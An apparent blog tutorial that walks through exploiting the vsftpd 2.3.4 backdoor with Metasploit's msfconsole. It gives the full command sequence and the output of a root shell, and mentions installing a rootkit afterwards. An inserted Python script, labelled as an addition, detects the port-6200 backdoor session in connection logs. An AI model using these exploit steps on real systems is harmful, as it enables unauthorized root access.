Of course we will use Metasploit, but more specifically we will use the msfconsole interface. Why not use the GUI? Simply put, command line interfaces are easier to automate through scripts, and the goal of any good IT professional is to automate as much of their workload as possible.
So, from your BackTrack 5R2 machine, open a terminal and type:
msfconsole
Depending on the speed of your machine, it could take a minute or two before you see anything happen. This is even more noticeable if you are running from a bootable image, so be patient. Once you get a command prompt back, the easiest way to find an exploit is to search for it using the search command. Let's pick on vsftpd and see what exploits are available.
msf > search vsftpd

Matching Modules
================

   Name                                  Disclosure Date          Rank       Description
   ----                                  ---------------          ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Execution
A backdoor? That sounds promising; let's use that one. To do so, enter the following command:
use exploit/unix/ftp/vsftpd_234_backdoor
You will note that your command prompt changes to include the exploit name. To see what options are available, type: show options
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
To see what payloads are available use the show payloads command.
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   Name               Disclosure Date  Rank    Description
   ----               ---------------  ----    -----------
   cmd/unix/interact                   normal  Unix Command, Interact with Established Connection
Before we can exploit our target we need to set some options and pick a payload. For this exploit it's fairly straightforward, since we only have to set the target IP address and select the one payload available (you'll note the target port is already set to 21).
To set the target IP address enter:
set RHOST 192.168.10.107
To set the payload enter:
set payload cmd/unix/interact
And to exploit simply enter:
exploit
If all goes well you should receive some output that looks like this.
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.10.100:51396 -> 192.168.10.107:6200) at 2012-11-26 19:30:23 -0600
You will also note that you do not receive a command prompt back. This is because you are now on your target system. To prove this, enter a command like ifconfig; you should see the IP information for your target. Since the session is running as root, you are now free to do just about anything you want, such as create a user, install a rootkit, start/stop daemons, etc. To get back to the msfconsole interface while leaving the session running, use Ctrl+Z. If you type exit or use the Ctrl+C combination you will close the session to your target.
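From the defender's side, the session line above is the tell: the shell arrives on TCP port 6200 seconds after the FTP exchange on port 21, from the same source. The following script is an added example, not part of the original post, that scans constructed connection-log lines (format and addresses are assumptions made up for the example) for exactly that sequence and separately flags any connection to port 6200 that has no recent FTP connection from the same source.

```python
import re
from datetime import datetime, timedelta

# Constructed sample connection log (not from the original post): one
# "timestamp src:sport -> dst:dport" record per line, in the style of the
# session line msfconsole printed above.
SAMPLE_LOG = """\
2012-11-26 19:30:20 192.168.10.100:51390 -> 192.168.10.107:21
2012-11-26 19:30:23 192.168.10.100:51396 -> 192.168.10.107:6200
2012-11-26 19:31:05 192.168.10.55:40001 -> 192.168.10.107:21
2012-11-26 19:45:00 192.168.10.55:40002 -> 192.168.10.107:6200
2012-11-26 19:32:00 192.168.10.77:40003 -> 192.168.10.107:6200
"""

LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (\S+):\d+ -> (\S+):(\d+)$")
FTP_PORT, SHELL_PORT = 21, 6200  # the two ports visible in the session output above


def parse_log(text):
    """Yield (timestamp, src_ip, dst_ip, dst_port) for every well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, src, dst, dport = m.groups()
            yield datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), src, dst, int(dport)


def find_backdoor_sessions(text, window=timedelta(minutes=5)):
    """Return (hits, orphans): hits are (src, dst) pairs where src reached dst:21
    and then dst:6200 within `window`; orphans are 6200 connections with no
    recent FTP connection from the same source (vsftpd has no business there)."""
    ftp_seen = {}  # (src, dst) -> timestamp of the most recent FTP connection
    hits, orphans = set(), set()
    for ts, src, dst, dport in sorted(parse_log(text)):  # chronological order
        key = (src, dst)
        if dport == FTP_PORT:
            ftp_seen[key] = ts
        elif dport == SHELL_PORT:
            last_ftp = ftp_seen.get(key)
            if last_ftp is not None and timedelta(0) <= ts - last_ftp <= window:
                hits.add(key)
            else:
                orphans.add(key)
    return sorted(hits), sorted(orphans)


if __name__ == "__main__":
    hits, orphans = find_backdoor_sessions(SAMPLE_LOG)
    for src, dst in hits:
        print(f"ALERT: {src} -> {dst}: FTP connection followed by shell on port {SHELL_PORT}")
    for src, dst in orphans:
        print(f"WARN: {src} -> {dst}: connection to port {SHELL_PORT} without recent FTP")
```

Run against the constructed log, the 192.168.10.100 pair from the post's session line is reported as an alert, while the other two sources appear as orphan port-6200 connections.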
Now this is a very simple exploit that is well documented, so we're definitely not breaking new ground here. This is just an example of how we can use Metasploit to gain access after finding a vulnerable service during a scan.
Next we'll look at a few more advanced options of Metasploit and start digging into some automation.
Until next time, thanks for reading.
Michael